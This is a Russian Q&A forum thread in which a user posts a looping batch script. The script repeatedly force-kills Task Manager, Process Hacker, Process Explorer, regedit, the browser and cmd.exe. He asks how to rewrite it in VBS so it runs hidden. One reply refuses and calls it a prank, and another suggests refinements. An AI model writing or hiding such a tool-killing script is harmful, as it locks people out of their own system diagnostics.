Здравствуйте, Нужна помощь от тех, кто знает VBS!!!

Матвей Кондауров Ученик (220), на голосовании 2 года назад
У меня есть код в bat файле:

:mail
taskkill /im Taskmgr.exe /f
taskkill /im am809.exe /f
taskkill /im ProcessHacker.exe /f
taskkill /im SystemExplorer.exe /f
taskkill /im SystemExplorerService64.exe /f
taskkill /im procexp.exe /f
taskkill /im procexp64.exe /f
taskkill /im regedit.exe /f
taskkill /im browser.exe /f
taskkill /im cmd.exe /f
goto mail

Не спрашивайте зачем я его написал, но нужно его переписать на VBS, потому-что повторяющаяся команда taskkill /im cmd.exe /f закрывает действие командной строки. Я его уже пытался переписывать на VBS, но появляется окошко, которое видно + этот процесс очень сильно нагружает компьютер. Сижу я на 10-ой винде. Если это сделать невозможно, то так и напишите. Заранее спасибо!!!

Вот bat файл: https://disk.yandex.ru/d/HhohlduHD94oIQ, можете проверять этот файл на https://www.virustotal.com/, этот файл точно не вирусный.
Голосование за лучший ответ
Иван Сигаев Искусственный Интеллект (150179) 2 года назад
И в чем требуется помощь?
Я его уже пытался переписывать на VBS, но появляется окошко - так и должно быть
этот процесс очень сильно нагружает компьютер - так и должно быть при работе бесконечного цикла
Матвей КондауровУченик (220) 2 года назад
Хорошо, спасибо
Матвей Кондауров, Лично я Вам помогать не буду т. к. занимаетесь западлом.
Матвей КондауровУченик (220) 2 года назад
Я всё сам сделал, далее я его переделаю в exe файл и всё заработает!

https://disk.yandex.ru/d/6SyNJEBzODpHzw и ещё сайт https://www.virustotal.com/(Ты знаешь, что с ним надо делать.)
Алекс Куха Высший разум (446521) 2 года назад
Строка taskkill /im cmd.exe /f неоднозначна
Имеет смысл искать необходимое по имени окна taskkill /FI "windowtitle eq name"
И ессно, поставить паузу между повторами цикла. На чём бы данный код не был бы написан, загрузка гарантирована. Вы собственноручно сделали вирусное задание
Список впечатляет.... Неужели всё так запущено?
Снимать задачи, которые запускаются службой самое бесполезное решение

Такое впечатление, что в компе есть задание, которое регулярно запускает гуёвый софт вроде браузера, таскманагера и процмониториннга